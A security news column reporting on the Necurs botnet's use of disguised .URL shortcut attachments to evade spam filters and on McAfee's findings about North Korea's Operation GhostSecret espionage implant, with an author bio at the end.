Large Necurs Botnet Uses New Spam Detection Evasion Trick

Necurs, one of the largest and long-lived spam botnets that’s still in operation today, has received an update that could help it evade spam filters.

The new trick, observed by researchers from Trend Micro, consists of spam emails with .zip attachments that contain files with the .URL extension. Many email providers and spam filters automatically block file attachments with potentially dangerous extensions, even when they’re located inside .zip archives, but .URL is not one of those.

On Windows, .URL files are displayed as shortcuts and will open websites or web-based directories. As all Windows shortcuts, they can have a custom icon and Necurs takes advantage of this to make them appear as media folders. Furthermore, the file names begin with IMG, PIC or SCN to suggest they’re images.

Once a user clicks on such a file, the computer will open a connection to a remote server over the SMB (Server Message Block) protocol and will execute a JavaScript file located on the server.

This tactic might successfully evade spam filters because the archive no longer contains a suspicious executable or scripting file. Furthermore, when executed through SMB the JavaScript is no longer downloaded to the local computer, so there’s nothing to scan.

“Previously, Necurs’s JavaScript downloader downloads the final payload,” the Trend Micro researchers said in a blog post. “But in its latest iteration, the remote script downloads QUANTLOADER (detected by Trend Micro as TROJ_QUANT) – a different downloader – which then downloads the final payload. This is another layer added to Necurs’s infection chain.”

QUANTLOADER itself is persistent on infected systems, as it sets up registry keys to get executed every time the OS starts. This means that attackers can serve additional malware or updates through it.

Attackers are always searching for new techniques that can trick users and evade security products. Users should be wary of email attachments from unknown sources, even if at first glance they appear to contain benign files such as, in this case, shortcuts.

North Korean Hackers Expand New Cyberespionage Campaign

The North and South Korean leaders met during a historic summit that paves the way for a peace agreement between their two countries. Meanwhile, in cyberspace, North Korean hackers continue to hack into foreign organizations to gather valuable information and potentially financial resources for the regime.

Security researchers from McAfee reported last month that Turkish banks were targeted in a new wave of attacks by North Korea’s notorious Lazarus Group, also known as Hidden Cobra. This group has been responsible for the attack on Sony Pictures in 2014 and for the theft of millions of dollars from central banks.

McAfee has since determined that the attacks against Turkish banks were part of a much larger cyberespionage campaign that targets organizations from around the world and which is still in its early reconnaissance stages.

The campaign, now dubbed Operation GhostSecret, uses a new data gathering implant that was found between March 14 and March 18 on computers belonging to organizations from 17 countries. The impacted organizations are from industries such as telecommunications, health care, finance, critical infrastructure and entertainment, and a large number of them are based in Thailand.

The new implant reuses a lot of code from the Destover malware that Hidden Cobra used against Sony in 2014 and in other attacks since then. McAfee has also found a previously undocumented component called Proxysvc that establishes encrypted communication with command-and-control servers and delivers additional payloads to infected systems.

“The evolution in complexity of these data-gathering implants reveals an advanced capability by an attacker that continues its development of tools,” the McAfee researchers said in a blog post. “Our investigation uncovered an unknown infrastructure connected to recent operations with servers in India using an advanced implant to establish a covert network to gather data and launch further attacks.”

Lucian Constantin

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at [email protected] or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 298 posts and counting.See all posts by lucian-constantin